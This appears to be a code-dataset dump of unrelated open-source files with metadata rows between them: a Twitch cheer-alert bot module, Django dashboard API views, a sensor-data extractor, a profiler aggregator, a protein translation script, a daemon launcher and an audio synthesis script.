placeholder="{username} thank you so much for cheering {num_bits} bits! PogChamp",
default="",
constraints={"max_str_len": 400},
),
ModuleSetting(
key="grant_points_per_100_bits",
label="Give points to user per 100 bits they cheer. 0 = off",
type="number",
required=True,
placeholder="",
default=0,
constraints={"min_value": 0, "max_value": 50000},
),
ModuleSetting(
key="alert_message_points_given",
label="Message to announce points were given to user, leave empty to disable message. If the user cheers less than 100 bits, no message will be sent. | Available arguments: {username}, {points}, {num_bits}",
type="text",
required=True,
default="{username} was given {points} points for cheering {num_bits} bits! FeelsAmazingMan",
constraints={"max_str_len": 300},
),
]
def __init__(self, bot):
super().__init__(bot)
def on_cheer(self, user, num_bits):
"""
A user just cheered bits.
Send the event to the websocket manager, and send a customized message in chat.
"""
payload = {"username": user.name, "num_bits": num_bits}
self.bot.websocket_manager.emit("cheer", payload)
if self.settings["chat_message"]:
if num_bits >= 25000 and self.settings["twentyfivethousand_bits"] != "":
self.bot.say(self.get_phrase("twentyfivethousand_bits", **payload))
elif num_bits >= 10000 and self.settings["tenthousand_bits"] != "":
self.bot.say(self.get_phrase("tenthousand_bits", **payload))
elif num_bits >= 5000 and self.settings["fivethousand_bits"] != "":
self.bot.say(self.get_phrase("fivethousand_bits", **payload))
elif num_bits >= 1500 and self.settings["fifteenhundred_bits"] != "":
self.bot.say(self.get_phrase("fifteenhundred_bits", **payload))
elif num_bits >= 500 and self.settings["fivehundred_bits"] != "":
self.bot.say(self.get_phrase("fivehundred_bits", **payload))
elif num_bits == 420 and self.settings["fourtwenty_bits"] != "":
self.bot.say(self.get_phrase("fourtwenty_bits", **payload))
elif num_bits >= 100 and self.settings["hundred_bits"] != "":
self.bot.say(self.get_phrase("hundred_bits", **payload))
elif num_bits == 69 and self.settings["sixnine_bits"] != "":
self.bot.say(self.get_phrase("sixnine_bits", **payload))
elif self.settings["one_bit"] != "":
self.bot.say(self.get_phrase("one_bit", **payload))
if self.settings["whisper_message"]:
if num_bits >= 25000 and self.settings["twentyfivethousand_bits"] != "":
self.bot.execute_delayed(
self.settings["whisper_after"],
self.bot.whisper,
user,
self.get_phrase("twentyfivethousand_bits", **payload),
)
elif num_bits >= 10000 and self.settings["tenthousand_bits"] != "":
self.bot.execute_delayed(
self.settings["whisper_after"],
self.bot.whisper,
user,
self.get_phrase("tenthousand_bits", **payload),
)
elif num_bits >= 5000 and self.settings["fivethousand_bits"] != "":
self.bot.execute_delayed(
self.settings["whisper_after"],
self.bot.whisper,
user,
self.get_phrase("fivethousand_bits", **payload),
)
elif num_bits >= 1500 and self.settings["fifteenhundred_bits"] != "":
self.bot.execute_delayed(
self.settings["whisper_after"],
self.bot.whisper,
user,
self.get_phrase("fifteenhundred_bits", **payload),
)
elif num_bits >= 500 and self.settings["fivehundred_bits"] != "":
self.bot.execute_delayed(
self.settings["whisper_after"],
self.bot.whisper,
user,
self.get_phrase("fivehundred_bits", **payload),
)
elif num_bits == 420 and self.settings["fourtwenty_bits"] != "":
self.bot.execute_delayed(
self.settings["whisper_after"],
self.bot.whisper,
user,
self.get_phrase("fourtwenty_bits", **payload),
)
elif num_bits >= 100 and self.settings["hundred_bits"] != "":
self.bot.execute_delayed(
self.settings["whisper_after"],
self.bot.whisper,
user,
self.get_phrase("hundred_bits", **payload),
)
elif num_bits == 69 and self.settings["sixnine_bits"] != "":
self.bot.execute_delayed(
self.settings["whisper_after"],
self.bot.whisper,
user,
self.get_phrase("sixnine_bits", **payload),
)
elif self.settings["one_bit"] != "":
self.bot.execute_delayed(
self.settings["whisper_after"],
self.bot.whisper,
user,
self.get_phrase("one_bit", **payload),
)
if self.settings["grant_points_per_100_bits"] <= 0:
return
round_number = math.floor(num_bits / 100)
if round_number > 0:
points_to_grant = round_number * self.settings["grant_points_per_100_bits"]
user.points += points_to_grant
alert_message = self.settings["alert_message_points_given"]
if alert_message != "":
self.bot.say(alert_message.format(username=user, points=points_to_grant, num_bits=num_bits))
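    # Worked example (comment added for clarity) of the calculation above, assuming
    # grant_points_per_100_bits is set to 50:
    #   a 250-bit cheer -> floor(250 / 100) = 2 -> 2 * 50 = 100 points granted
    #   a  99-bit cheer -> floor(99 / 100)  = 0 -> no points, no alert message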
def on_pubmsg(self, source, tags, **rest):
if "bits" not in tags:
return
try:
num_bits = int(tags["bits"])
except ValueError:
log.error("BabyRage error occurred with getting the bits integer")
return
if "display-name" not in tags:
log.debug(f"cheeralert requires a display-name, but it is missing: {tags}")
return
self.on_cheer(source, num_bits)
def enable(self, bot):
HandlerManager.add_handler("on_pubmsg", self.on_pubmsg)
def disable(self, bot):
HandlerManager.remove_handler("on_pubmsg", self.on_pubmsg)
|
mit
| -5,770,239,708,818,410,000
| 43.690037
| 219
| 0.546033
| false
| 4.222803
| false
| false
| false
|
artemharutyunyan/copilot
|
src/copilot-dashboard/copilot_dashboard/dashboard/views.py
|
1
|
3545
|
import httplib2
import datetime
from urllib import urlencode
from random import random
from django.http import HttpRequest, HttpResponse
from django.core.serializers.json import DjangoJSONEncoder
from django.utils import simplejson
from django.conf import settings
import bson.json_util
from bson.objectid import ObjectId
import models as DB
from copilot_dashboard.settings import SETTINGS
HTTP = httplib2.Http("/tmp/httplib2-cache")
### Handlers ###
def ping(request):
"""
GET /api/ping
Responds with {"ping":"pong"} (HTTP 200) in case the system is working fine
Status codes:
* 200 - OK
"""
return json({'ping': 'pong'})
def stats(request):
"""
GET /api/stats?target={graphite path}[&from={start timestamp}&until={end timestamp}]
A simple Graphite proxy
Status codes:
* 200 - OK
* 400 - Missing query parameter
* 500 - No such data is available
"""
try:
path = request.GET['target']
except KeyError, e:
return json({'error': True}, 400)
start = request.GET.get('from', None)
end = request.GET.get('until', None)
data = mk_graphite_request(path, start, end)
return HttpResponse(data, mimetype="application/json")
def connections(request):
"""
GET /api/connections?from={start}[&allactive=true]
Lists all connected users in specified timeframe.
If 'allactive' is set to 'true', the timeframe will be ignored and instead
all currently connected users will be listed.
Response (JSON):
[
{"_id": "Document ID", "loc": [Longitude, Latitude]},
...
]
Status codes:
* 200 - OK
* 400 - Missing query parameter (from)
"""
collection = DB.get_collection('connections')
docs = []
query = None
if request.GET.get('allactive', 'false') == 'true':
query = {'connected': True, 'agent_data.component': 'agent'}
else:
try:
start = datetime.datetime.fromtimestamp(int(request.GET['from'])/1000)
except KeyError, e:
return json({'error': True}, 400)
query = {'updated_at': {'$gte': start}, 'agent_data.component': 'agent'}
for doc in collection.find(query, {'_id': 1, 'loc': 1}):
doc['loc'] = [coord + random()*0.0004 for coord in doc['loc']]
docs.append(doc)
return json(docs)
def connection_info(request, id):
"""
GET /api/connection/{connection id}
Responds with all data available for the specified connection (except for document's ID and coordinates).
Status codes:
* 200 - OK
* 404 - Given ID did not match any documents
"""
doc = DB.get_connection(id)
if not doc:
return json({'error': True}, 404)
else:
doc['contributions'] = DB.get_contributions(doc['agent_data']['id'])
return json(doc)
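# Hedged client-side sketch (not part of this module; the host, port and id are
# placeholders) showing how the endpoints above are typically called:
#
#   import requests
#   requests.get('http://localhost:8000/api/ping').json()             # {'ping': 'pong'}
#   requests.get('http://localhost:8000/api/connections',
#                params={'allactive': 'true'}).json()                 # [{'_id': ..., 'loc': [lon, lat]}, ...]
#   requests.get('http://localhost:8000/api/connection/<id>').json()  # full connection document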
### Utilities ###
def mk_graphite_request(path, start, end):
global HTTP
  query = {'target': path, 'format': 'json', '_salt': str(random())[2:]}
if start:
query['from'] = start
if end:
query['until'] = end
url = "http://%s:%s/render/?%s" % (SETTINGS['GRAPHITE_HOST'], SETTINGS['GRAPHITE_PORT'], urlencode(query))
headers, content = HTTP.request(url, "GET")
return content
class EnhancedJSONEncoder(DjangoJSONEncoder):
"""
Custom JSON encoder which can serialize MongoDB's ObjectId objects.
"""
def default(self, o, **kwargs):
if isinstance(o, ObjectId):
return str(o)
else:
return DjangoJSONEncoder.default(self, o, **kwargs)
def json(data, status=200):
data = simplejson.dumps(data, cls=EnhancedJSONEncoder, separators=(',', ':'))
return HttpResponse(data, mimetype='application/json', status=status)
|
bsd-3-clause
| 345,892,791,650,336,500
| 25.856061
| 108
| 0.667137
| false
| 3.643371
| false
| false
| false
|
petr-devaikin/dancee
|
helpers/extractor.py
|
1
|
5790
|
# Cut the experiment session in small fragments
# Input: ../bin/data/records/{session}/body.csv and skeletok.csv
# Output: fragments/{fragment_number}.json and fragments/log.csv
import os
import numpy
import json
DELAY = 15
LENGTH = 30
OVERLAP = 0.719999
FREQUENCY = 60
MARGIN = 5
CUTOFF_FREQUENCY = 10
buf_length = FREQUENCY / CUTOFF_FREQUENCY
kernel = numpy.blackman(buf_length)
kernel_summ = numpy.sum(kernel)
to_filter = [
9, 10, 11, #r_shoulder
12, 13, 14, #r_elbow
15, 16, 17, #r_hand
18, 19, 20, #l_shoulder
21, 22, 23, #l_elbow
24, 25, 26, #l_hand
27, 28, 29, #r_hip
30, 31, 32, #r_knee
36, 37, 38, #r_foot
39, 40, 41, #l_hip
42, 43, 44, #l_knee
48, 49, 50 #l_foot
]
buffers = [[0] * buf_length] * len(to_filter)
values = [0] * len(to_filter)
values2 = [0] * len(to_filter)
# emg filtering
CUTOFF_EMG_FREQUENCY = 6
buf_emg_length = FREQUENCY / CUTOFF_EMG_FREQUENCY
kernel_emg = numpy.blackman(buf_emg_length)
kernel_emg_summ = numpy.sum(kernel_emg)
emg2_buffer = [0] * buf_emg_length
# acc filtering
CUTOFF_ACC_FREQUENCY = 10
buf_acc_length = FREQUENCY / CUTOFF_ACC_FREQUENCY
kernel_acc = numpy.blackman(buf_acc_length)
kernel_acc_summ = numpy.sum(kernel_acc)
acc_buffer = [[0] * buf_acc_length] * 3
# clean the folder
for f in os.listdir("fragments"):
os.remove(os.path.join('fragments', f))
# cut fragments
record_counter = 0
def cut_fragment(participant, track_number):
global record_counter
global values
global values2
global buffers
global emg2_buffer
global acc_buffer
print "Cut participant " + participant + ", track " + str(track_number)
result_data = {
'acc1': [],
'acc2': [],
'acc2_nf': [],
'emg1': [],
'emg2': [],
'emg2_nf': [],
'skeleton': [],
'skeleton_nf': [],
}
path = "../bin/data/records/"
for rec in os.listdir(path):
if rec.split(' ')[0] == participant:
with open(path + rec + "/body.csv", 'r') as f_read_body:
with open(path + rec + "/skeleton.csv", 'r') as f_read_skeleton:
i = 0
while i < (DELAY + (OVERLAP + LENGTH) * (track_number + 1) - MARGIN) * FREQUENCY:
line_body = f_read_body.readline().strip().split('\t')
line_skeleton = f_read_skeleton.readline().strip().split('\t')
values3 = [0] * len(to_filter)
if i >= (DELAY + OVERLAP + (OVERLAP + LENGTH) * track_number) * FREQUENCY:
values = [float(line_skeleton[j]) for j in to_filter]
for j in range(2, len(values), 3):
if values[j] > 1.4:
values2[j - 2] = values[j - 2]
values2[j - 1] = values[j - 1]
values2[j] = values[j]
for j in range(len(values)):
buffers[j].append(values2[j])
buffers[j] = buffers[j][1:]
for k in range(buf_length):
values3[j] += buffers[j][k] * kernel[k]
values3[j] /= kernel_summ
#emg filtering
emg2 = float(line_body[7])
emg2_nf = emg2
emg2_buffer.append(emg2)
emg2_buffer = emg2_buffer[1:]
emg2 = 0
for k in range(buf_emg_length):
emg2 += emg2_buffer[k] * kernel_emg[k]
emg2 /= kernel_emg_summ
line_body[7] = str(emg2)
#acc filtering
acc_values = [float(v) for v in line_body[3:6]]
for j in range(3):
v = float(line_body[3 + j])
acc_buffer[j].append(v)
acc_buffer[j] = acc_buffer[j][1:]
v2 = 0
for k in range(buf_acc_length):
v2 += acc_buffer[j][k] * kernel_acc[k]
v2 /= kernel_acc_summ
line_body[j + 3] = str(v2)
if i >= (DELAY + OVERLAP + (OVERLAP + LENGTH) * track_number + MARGIN) * FREQUENCY:
result_data['acc1'].append([float(v) - 512 for v in line_body[0:3]])
result_data['acc2'].append([float(v) - 512 for v in line_body[3:6]])
result_data['acc2_nf'].append(acc_values)
result_data['emg1'].append(float(line_body[6]))
result_data['emg2'].append(float(line_body[7]))
result_data['emg2_nf'].append(emg2_nf)
result_data['skeleton'].append({
'r_shoulder': values3[0:3],
'r_elbow': values3[3:6],
'r_hand': values3[6:9],
'l_shoulder': values3[9:12],
'l_elbow': values3[12:15],
'l_hand': values3[15:18],
'r_hip': values3[18:21],
'r_knee': values3[21:24],
'r_foot': values3[24:27],
'l_hip': values3[27:30],
'l_knee': values3[30:33],
'l_foot': values3[33:36]
})
result_data['skeleton_nf'].append({
'r_shoulder': values[0:3],
'r_elbow': values[3:6],
'r_hand': values[6:9],
'l_shoulder': values[9:12],
'l_elbow': values[12:15],
'l_hand': values[15:18],
'r_hip': values[18:21],
'r_knee': values[21:24],
'r_foot': values[24:27],
'l_hip': values[27:30],
'l_knee': values[30:33],
'l_foot': values[33:36]
})
i += 1
with open('fragments/' + str(record_counter) + '.json', "w") as f_write:
json.dump(result_data, f_write)
break
else:
print "Cannot find data for participant ", participant, "\n"
return None
record_counter += 1
return record_counter - 1
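# Worked example of the windowing above (comment added for clarity), with the
# constants from the top of the file (DELAY=15, OVERLAP~0.72, LENGTH=30, MARGIN=5,
# FREQUENCY=60): for track 0 the filters warm up from t ~ 15.72 s, samples are
# written out between t ~ 20.72 s and t ~ 40.72 s, i.e. LENGTH - 2*MARGIN = 20 s
# of data per fragment.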
with open('selftest/results.txt', 'r') as f:
with open('fragments/log.csv', 'w') as log:
log.write('Participant\tTrack number\tTrack order\tValence\tArousal\tFragment\n')
participant = -1
track_number = 0
for line in f:
            ar = line.strip().split(' ')
if ar[0] != participant:
track_number = 0
participant = ar[0]
track_real_number = ar[1]
valence = ar[2]
arousal = ar[3]
record = cut_fragment(participant, track_number)
log.write(participant + '\t' + track_real_number + '\t' + str(track_number) + '\t' + valence + '\t' + arousal + '\t' + str(record) + '\n')
track_number += 1
#break
|
gpl-3.0
| -8,201,075,262,819,803,000
| 25.199095
| 141
| 0.580656
| false
| 2.549538
| false
| false
| false
|
quantumgraph/qgprofiler
|
qgprofiler/qg_profile_aggregator.py
|
1
|
4240
|
from node import Node, NodeList
from .qg_profiler import QGProfiler
from .helper import get_real_file_path, get_file_type, xml_scanner, read_attributes_from_xml, merge_attributes
import glob
import json
class QGProfileAggregator(object):
def __init__(self, in_file_path, out_file_path):
self.root_node = Node('i_am_root', None, {})
self.in_file_path = get_real_file_path(in_file_path)
get_file_type(out_file_path)
self.out_file_path = get_real_file_path(out_file_path)
def add_json(self, _json):
new_node = self.make_node_from_json(_json, self.root_node)
new_node_list = NodeList()
new_node_list.append(new_node)
self.merge_node_list_to_node(self.root_node, new_node_list)
def merge_node_list_to_node(self, main_node, node_list):
for node in node_list:
index = main_node.is_child_in_children(node.get_name())
if index == -1:
main_node.add_child(node)
else:
existing_node = main_node.get_child(index)
existing_node.increment_value_by(node.get_value())
existing_node.increment_count_by(node.get_count())
existing_node.set_aggregate_attr(merge_attributes(node.get_aggregate_attr(), existing_node.get_aggregate_attr()))
existing_node.update_over_head(node.get_over_head())
self.merge_node_list_to_node(existing_node, node.get_children())
def make_node_from_json(self, _json, parent_node):
name = _json['name']
value = _json['value']
count = _json['count']
children = _json['children']
attributes = _json.get('attributes', {})
over_head = _json.get('overhead', 0)
new_node = Node(name, parent_node, attributes)
new_node.set_value(value)
new_node.set_count(count)
new_node.set_over_head(over_head)
for child in children:
child_node = self.make_node_from_json(child, new_node)
new_node.add_child(child_node)
return new_node
def add_xml(self, _xml):
current_node = self.root_node
xml_gen = xml_scanner(_xml)
for each in xml_gen:
if each[0] == 'START':
name = str(each[2]['name'])
value = float(each[2]['value'])
count = int(each[2]['count'])
over_head = float(each[2].get('overhead', 0))
attributes = read_attributes_from_xml(each[2].get('attributes', {}))
index = current_node.is_child_in_children(name)
if index == -1:
new_node = Node(name, current_node, attributes)
new_node.set_value(value)
new_node.set_count(count)
new_node.set_over_head(over_head)
current_node.add_child(new_node)
current_node = new_node
else:
current_node = current_node.get_child(index)
current_node.increment_value_by(value)
current_node.increment_count_by(count)
current_node.set_aggregate_attr(merge_attributes(attributes, current_node.get_aggregate_attr()))
current_node.update_over_head(over_head)
elif each[0] == 'END':
current_node = current_node.get_parent()
def generate_file(self, rounding_no=6):
for file_path in glob.iglob(self.in_file_path):
filename = file_path.split('/')[-1]
if filename.endswith('.json'):
with open(file_path, 'r') as f:
raw_json = f.read()
_json = json.loads(raw_json)
self.add_json(_json)
elif filename.endswith('.xml'):
with open(file_path, 'r') as f:
_xml = f.read()
self.add_xml(_xml)
qg_profiler = QGProfiler('test', self.out_file_path)
if len(self.root_node.get_children()) == 1:
qg_profiler.root_node = self.root_node.get_child(0)
else:
qg_profiler.root_node = self.root_node
qg_profiler.generate_file(rounding_no)
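# Minimal usage sketch (the paths are hypothetical): aggregate every profile dump
# matching a glob pattern into a single output file.
#
#   aggregator = QGProfileAggregator('/tmp/profiles/*.json', '/tmp/aggregate.json')
#   aggregator.generate_file(rounding_no=4)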
|
mit
| 7,139,093,304,680,659,000
| 43.631579
| 129
| 0.556132
| false
| 3.617747
| false
| false
| false
|
macmanes-lab/MCBS913
|
code/Junhong Chen/generateProtineSeq.py
|
1
|
4902
|
"""
Author: Junhong Chen
"""
from Bio.Alphabet import IUPAC
from Bio.Seq import Seq
from Bio import SeqIO
from sys import argv
import os
path = argv[1]
class CDS:
def __init__(self,gff):
self.data = dict()
self.fname = gff
def parse(self):
file = open(self.fname,"r")
for elem in file:
if "CDS" in elem:
tmp = elem.split()
ind = tmp.index("CDS")
if tmp[0] in self.data:
self.data[tmp[0]].append((int(tmp[ind+1]),int(tmp[ind+2]),tmp[ind+4]))
else:
self.data[tmp[0]] = [(int(tmp[ind+1]),int(tmp[ind+2]),tmp[ind+4])]
def getContigName(self):
return self.data.keys()
def getContigNumber(self):
return len(self.data)
def getContigCDSIndex(self,name):
if name in self.data:
return self.data[name]
else:
print "No indices for that contig ID: ", name
#return self.data[name.split(".")[0]]
def getContigCDSSize(self,name):
return len(self.getContigCDSIndex(name))
class RefSeq:
def __init__(self,fast):
self.fname = fast
self.data = dict()
self.result = dict()
self.cds = CDS(fast.split(".")[0]+".gff")
def parse(self):
fast = SeqIO.parse(open(self.fname),"fasta")
for elem in fast:
tmp = elem.id.split("|")[3]
if tmp in self.data:
print "ATTENTION: same contig ID in: " + self.fname
else:
self.data[tmp] = str(elem.seq)
def getContigSeq(self,name):
if name in self.data:
return self.data[name]
else:
print "Can NOT find the contig: "+name
def getContigData(self):
return self.data
def getContigID(self):
return self.data.keys()
def getContigCDSSize(self,name):
return self.cds.getContigCDSSize(name)
def translate(self,mode = IUPAC.ambiguous_dna):
self.cds.parse()
contig = self.data.keys()
for name in contig:
ind = self.cds.getContigCDSIndex(name)
sq = self.data[name]
ret = []
for tup in ind:
myseq = sq[tup[0]-1:tup[1]]
#store Seq Object
if tup[2] == "+":
ret.append(Seq(myseq, mode).translate())
else:
ret.append(Seq(myseq, mode).reverse_complement().translate())
self.result[name] = ret
return self.result
def getCDSSeq(self,name,index):
sq = self.data[name]
ind = self.cds.getContigCDSIndex(name)[index]
        print self.cds.getContigName()
return sq[ind[0]-1:ind[1]]
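# Compare the protein translations derived from <path>.fasta and <path>.fastd:
# returns the fraction of CDS regions whose .fasta translation is contained in
# the corresponding .fastd translation.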
def compareProtineSeq(path):
refd = RefSeq(path+".fastd")
refd.parse()
refa = RefSeq(path+".fasta")
refa.parse()
refat = refa.translate()
refdt = refd.translate()
#print refat["NC_008752.1"][3]
#print refdt["NC_008752.1"][3]
#print refa.getCDSSeq("NC_008752.1",3)
#print refd.getCDSSeq("NC_008752.1",3)
id = refd.getContigID()
ret = dict()
for name in id:
mis = []
l = refa.getContigCDSSize(name)
stat = 0
for i in range(l):
if refat[name][i] in refdt[name][i]:
stat = stat + 1
else:
mis.append(i)
ret[name] = (l,stat,mis)
def sum(x):
ret = 0.
for el in x:
ret = ret + el*1.
return ret
mis = [x[1] for x in ret.values()]
tot = [x[0] for x in ret.values()]
return sum(mis)/sum(tot)
#return ret
def getFilesinCWD(path):
    if path[-1] != "/":
path = path + "/"
ref = []
files = [f for f in os.listdir(path)]
for i in range(1,5):
for fo in files:
f = fo.split(".")[0]
if f not in ref and f.startswith(str(i)+"-"):
ref.append(f)
ret = [path+tp for tp in ref]
return ret
def doCompare(path):
fpath = getFilesinCWD(path)
retp = [f.split("/")[-1] for f in fpath]
ret = []
for p in fpath:
ret.append(compareProtineSeq(p))
return retp,ret
if __name__ == "__main__":
print doCompare(path)
##refa = RefSeq(path+".fasta")
#refa.parse()
#print refa.getCDSSeq("NC_008752",0)
|
mit
| -7,779,518,581,467,217,000
| 20.5
| 90
| 0.467768
| false
| 3.617712
| false
| false
| false
|
openre/openre
|
openre/agent/domain/__init__.py
|
1
|
1623
|
# -*- coding: utf-8 -*-
"""
Domain. Creates one process for each openre domain. Receives and passes on
spikes (pub), receives commands from the server (req-rep) and forwards the
result of the command execution.
"""
from openre.agent.decorators import daemonize
from openre.agent.helpers import daemon_stop
import logging
import signal
from openre.agent.args import parse_args
from openre.agent.domain.args import parser
from openre.agent.domain.domain import Agent
def run():
args = parse_args(parser)
def sigterm(signum, frame):
signum_to_str = dict(
(k, v) for v, k in reversed(sorted(signal.__dict__.items()))
if v.startswith('SIG') and not v.startswith('SIG_')
)
logging.debug(
'Got signal.%s. Clean and exit.',
signum_to_str.get(signum, signum)
)
exit(0)
@daemonize(
args.pid_file,
signal_map={
signal.SIGTERM: sigterm,
signal.SIGINT: sigterm,
},
)
def start():
"""
        Start the server
"""
logging.info('Start OpenRE.Agent domain')
agent = Agent(vars(args))
agent.run()
def stop():
"""
        Stop the server
"""
logging.info('Stop OpenRE.Agent domain')
daemon_stop(args.pid_file)
if args.action == 'start':
start()
elif args.action == 'stop':
stop()
elif args.action == 'restart':
stop()
start()
|
mit
| -6,384,374,142,818,930,000
| 24.413793
| 74
| 0.580054
| false
| 3.096639
| false
| false
| false
|
ttm/pingosom
|
pingosom2.py
|
1
|
50613
|
#-*- coding: utf-8 -*-
import numpy as n, random, os, sys, time
from scipy.io import wavfile as w
tfoo=time.time()
H=n.hstack
V=n.vstack
f_a = 44100. # Hz, sampling frequency
############## 2.2.1 Lookup table (LUT)
Lambda_tilde=Lt=1024.*16
# Sine
fooXY=n.linspace(0,2*n.pi,Lt,endpoint=False)
S_i=n.sin(fooXY) # one period of the sine wave with T samples
# Square:
Q_i=n.hstack( ( n.ones(Lt/2)*-1 , n.ones(Lt/2) ) )
# Triangle:
foo=n.linspace(-1,1,Lt/2,endpoint=False)
Tr_i=n.hstack( ( foo , foo*-1 ) )
# Sawtooth:
D_i=n.linspace(-1,1,Lt)
def v(f=220,d=2.,tab=S_i,fv=2.,nu=2.,tabv=S_i):
    if nu==13.789987:
        return n.zeros(int(f_a*d))
    Lambda=n.floor(f_a*d)
    ii=n.arange(Lambda)
    Lv=float(len(tabv))
    Gammav_i=n.floor((ii*fv*Lv)/f_a) # indices into the LUT
    Gammav_i=n.array(Gammav_i,n.int)
    # vibrato variation pattern at each sample
    Tv_i=tabv[Gammav_i%int(Lv)]
    # frequency in Hz at each sample
    F_i=f*( 2.**( Tv_i*nu/12. ) )
    # table increment per sample
    D_gamma_i=F_i*(Lt/float(f_a))
    Gamma_i=n.cumsum(D_gamma_i) # accumulated position in the table
    Gamma_i=n.floor( Gamma_i) # now the indices
    Gamma_i=n.array( Gamma_i, dtype=n.int) # as integer indices
    return tab[Gamma_i%int(Lt)] # look the indices up in the table
def A(fa=2.,V_dB=10.,d=2.,taba=S_i):
    # Use as: v(d=XXX)*A(d=XXX)
    Lambda=n.floor(f_a*d)
    ii=n.arange(Lambda)
    Lt=float(len(taba))
    Gammaa_i=n.floor(ii*fa*Lt/f_a) # indices into the LUT
    Gammaa_i=n.array(Gammaa_i,n.int)
    # amplitude variation at each sample
    A_i=taba[Gammaa_i%int(Lt)]
    A_i=1+A_i*(1- 10.**(V_dB/20.))
    return A_i
def adsr(som,A=10.,D=20.,S=-20.,R=100.,xi=1e-2):
"""Envelope ADSR com
A ataque em milissegundos,
D decay em milissegundos
S sustain, com número de decibéis a menos
R Release em milisegundos
Atenção para que a duração total é dada pelo som em si
e que a duração do trecho em sustain é a diferença
entre a duração total e as durações das partes ADR."""
a_S=10**(S/20.)
Lambda=len(som)
Lambda_A=int(A*f_a*0.001)
Lambda_D=int(D*f_a*0.001)
Lambda_R=int(R*f_a*0.001)
Lambda_S=Lambda - Lambda_A - Lambda_D - Lambda_R
ii=n.arange(Lambda_A,dtype=n.float)
A=ii/(Lambda_A-1)
A_i=A # ok
ii=n.arange(Lambda_A,Lambda_D+Lambda_A,dtype=n.float)
D=1-(1-a_S)*( ( ii-Lambda_A )/( Lambda_D-1) )
A_i=n.hstack( (A_i, D ) )
S=n.ones(Lambda-Lambda_R-(Lambda_A+Lambda_D),dtype=n.float)*a_S
A_i=n.hstack( ( A_i, S ) )
ii=n.arange(Lambda-Lambda_R,Lambda,dtype=n.float)
R=a_S-a_S*((ii-(Lambda-Lambda_R))/(Lambda_R-1))
A_i=n.hstack( (A_i,R) )
return som*A_i
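# usage sketch (illustrative only, not part of the original script): a note is
# synthesized with v() and then amplitude-shaped with adsr(), e.g.:
#nota_exemplo = adsr(v(f=440.,d=1.,fv=5.,nu=.5),A=20.,D=30.,S=-10.,R=150.)
#w.write('nota_exemplo.wav', f_a, n.int16(nota_exemplo*(2**15-1)))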
triadeM=[0.,4.,7.]
def ac(f=220.,notas=[0.,4.,7.,12.],tab=Q_i,d=2.,nu=0,fv=2.):
acorde=adsr(v(tab=tab,d=d,f=f*2.**(notas[-1]/12.),nu=nu,fv=fv))
for na in notas[:-1]:
acorde+=adsr(v(tab=tab,d=d,f=f*2**(na/12.),nu=nu,fv=fv))
return acorde*10
def N(arr,xx=1.):
r=arr
r = (((r-r.min())/(r.max()-r.min()))*2-1)*xx
return n.int16(r * float(2**15-1))
def NN(arr):
return 2*((arr-arr.min())/(arr.max()-arr.min()))-1
vozes="f3,f2,f1,f5,m5,m1,m3".split(",")
def fala(frase="Semicondutor livre",ss=160):
arq=frase.split()[0]
#os.system("espeak -vpt-pt+%s -w%s.wav -g110 -p99 -s110 -b=1 '%s'"%(random.sample(vozes,1)[0],arq,frase))
os.system(u"espeak -vpt-pt+%s -w%s.wav -p99 -b=1 '%s' -s%i"%(random.sample(vozes,1)[0],arq,frase,ss))
#os.system(u"espeak "+ frase +(u" -vpt-pt+%s -w%s.wav -p99 -b=1 -s%i"%(random.sample(vozes,1)[0],arq,ss)))
#os.system("espeak -vpt-pt+%s -w%s.wav -g110 -p99 -s130 -b=1 '%s'"%(random.sample(vozes,1)[0],arq,frase))
ff=w.read("%s.wav"%(arq,))[1]
ff_=n.fft.fft(ff)
s=ff2=n.fft.ifft( n.hstack((ff_,n.zeros(len(ff_)) )) ).real
sc_aud=((s-s.min())/(s.max()-s.min()))*2.-1.
return sc_aud*10
####
# noises
Lambda = 100000 # Lambda always even
# frequency difference between neighbouring coefficients:
df = f_a/float(Lambda)
coefs = n.exp(1j*n.random.uniform(0, 2*n.pi, Lambda))
# even real part, odd imaginary part (Hermitian symmetry, so the inverse FFT is real)
coefs[Lambda/2+1:] = n.real(coefs[1:Lambda/2])[::-1] - 1j * \
n.imag(coefs[1:Lambda/2])[::-1]
coefs[0] = 0. # no DC bias
coefs[Lambda/2] = 1. # the maximum-frequency coefficient is simply real
# the frequencies associated with each coefficient
# (not meaningful above Lambda/2)
fi = n.arange(coefs.shape[0])*df
f0 = 15. # we start the noise at 15 Hz
i0 = int(n.floor(f0/df)) # first coefficient that counts
coefs[:i0] = n.zeros(i0)
f0 = fi[i0]
# obtain the noise as time-domain samples
ruido = n.fft.ifft(coefs)
r = n.real(ruido)
r = ((r-r.min())/(r.max()-r.min()))*2-1
rb=r
r = n.int16(r * float(2**15-1))
w.write('branco.wav', f_a, r)
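### Brown noise
# for each octave, we lose 6 dB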
fator = 10.**(-6/20.)
alphai = fator**(n.log2(fi[i0:]/f0))
c = n.copy(coefs)
c[i0:] = c[i0:]*alphai
# even real part, odd imaginary part
c[Lambda/2+1:] = n.real(c[1:Lambda/2])[::-1] - 1j * \
n.imag(c[1:Lambda/2])[::-1]
# time-domain samples of the brown noise
ruido = n.fft.ifft(c)
r = n.real(ruido)
r = ((r-r.min())/(r.max()-r.min()))*2-1
rm=r
r = n.int16(r * float(2**15-1))
w.write('marrom.wav', f_a, r)
### 2.53 Blue noise
# for each octave, we gain 3 dB
fator = 10.**(3/20.)
alphai = fator**(n.log2(fi[i0:]/f0))
c = n.copy(coefs)
c[i0:] = c[i0:]*alphai
# even real part, odd imaginary part
c[Lambda/2+1:] = n.real(c[1:Lambda/2])[::-1] - 1j * \
n.imag(c[1:Lambda/2])[::-1]
# time-domain samples of the blue noise
ruido = n.fft.ifft(c)
r = n.real(ruido)
r = ((r-r.min())/(r.max()-r.min()))*2-1
ra=r
r = n.int16(r * float(2**15-1))
w.write('azul.wav', f_a, r)
### 2.54 Violet noise
# for each octave, we gain 6 dB
fator = 10.**(6/20.)
alphai = fator**(n.log2(fi[i0:]/f0))
c = n.copy(coefs)
c[i0:] = c[i0:]*alphai
# even real part, odd imaginary part
c[Lambda/2+1:] = n.real(c[1:Lambda/2])[::-1] - 1j * \
n.imag(c[1:Lambda/2])[::-1]
ruido = n.fft.ifft(c)
r = n.real(ruido)
r = ((r-r.min())/(r.max()-r.min()))*2-1
rv=r
r = n.int16(r * float(2**15-1))
w.write('violeta.wav', f_a, r)
### 2.51 Pink noise
# for each octave, we lose 3 dB
fator = 10.**(-3/20.)
alphai = fator**(n.log2(fi[i0:]/f0))
c = n.copy(coefs)
c[i0:] = coefs[i0:]*alphai
# even real part, odd imaginary part
c[Lambda/2+1:] = n.real(c[1:Lambda/2])[::-1] - 1j * \
n.imag(c[1:Lambda/2])[::-1]
